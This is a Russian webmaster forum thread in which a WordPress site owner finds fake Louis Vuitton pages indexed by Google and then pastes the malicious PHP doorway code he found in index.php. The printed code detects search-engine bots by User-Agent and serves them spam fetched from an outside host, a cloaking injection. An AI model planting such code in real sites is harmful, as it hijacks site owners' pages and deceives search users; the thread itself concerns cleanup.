Левые страницы в индексе google

A0
На сайте с 09.01.2014
Offline
10
865

Добрый день. Подскажите ни кто не сталкивался с такой проблемой, google индексирует страницы

http://сайт.ru/louis-vuitton-beanie-zdb1150.html

http://сайт.ru/louis-vuitton-belt-zdb554.html

естественно таких страниц на сайте нет. Похоже на вирусню.

Сайт на Wordpress. Может кто сталкивался?

R
На сайте с 24.01.2008
Offline
180
#1

ТС если контент данных страниц отличается, скорей всего у вас дор. Необходимо сделать проверку сайта на вредоносные коды ну и на сам дор собственно.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
A0
На сайте с 09.01.2014
Offline
10
#2
Rxp:
ТС если контент данных страниц отличается, скорей всего у вас дор. Необходимо сделать проверку сайта на вредоносные коды ну и на сам дор собственно.

Сайт солью и антивирем прогоню. Может подскажите где посмотреть если ничего ни найду?

---------- Добавлено 31.03.2014 в 15:31 ----------

В общем код дора нашел в index.php:


$bot_list = array('Googlebot','aol.','.ask.','abacho','abizdirectory','about','acoon','allpages','allthesites','alltheuk','alltheweb','altavista','america','bot','bingbot','bingpreview','brainysearch','crawl','dmoz','dogpile','ebay','ehow','entireweb','euroseek','exalead','excite','facebook','fastbot','filesearch','-goo','google','google web preview','hispavista','hotbot','linkedin','live','lycos','mamma','metabot','metacrawler','metaeureka','mojeek','msn','msnbot','msrbot','myspace','netscape','obot','pinterest','rambler','search','spider','teoma','terra','tiscali','twitter','vkontakte','voila','wanadoo','web-archiv','webalta','webcrawler','websuche','yahoo','yandex','yell','youtube','zoneru');
$domain = $_SERVER['HTTP_HOST'];
$submit = 'http://links.freedns.ddosattacker.com/links/api.php';
$url = $submit.'?domain='.$domain;
$fetch_page = false;
foreach($bot_list as $bot)
{
if(preg_match("#" . $bot ."#is", getenv("HTTP_USER_AGENT")))
{
$fetch_page = true;
break;
}
}
if($fetch_page == true)
{
submit_load_site($url);
}
function submit_load_site($url)
{
$useragent = 'demo';
$ch = curl_init();
$options = array(
CURLOPT_URL => $url,
CURLOPT_HEADER => 0,
CURLOPT_USERAGENT => $useragent,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_SSL_VERIFYPEER => 0,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_ENCODING => "",
CURLOPT_AUTOREFERER => 1,
CURLOPT_CONNECTTIMEOUT => 30,
CURLOPT_TIMEOUT => 30,
CURLOPT_MAXREDIRS => 5,
);
curl_setopt_array($ch,$options);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
}

В общем то примитивно и в лоб. Боюсь что будут рецидивы, наверняка есть еще какой нибуть кусок кода который запишит код дора по новой. Для файлов в корне сайта назначил права 444, как еще себя можно обезопасить?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий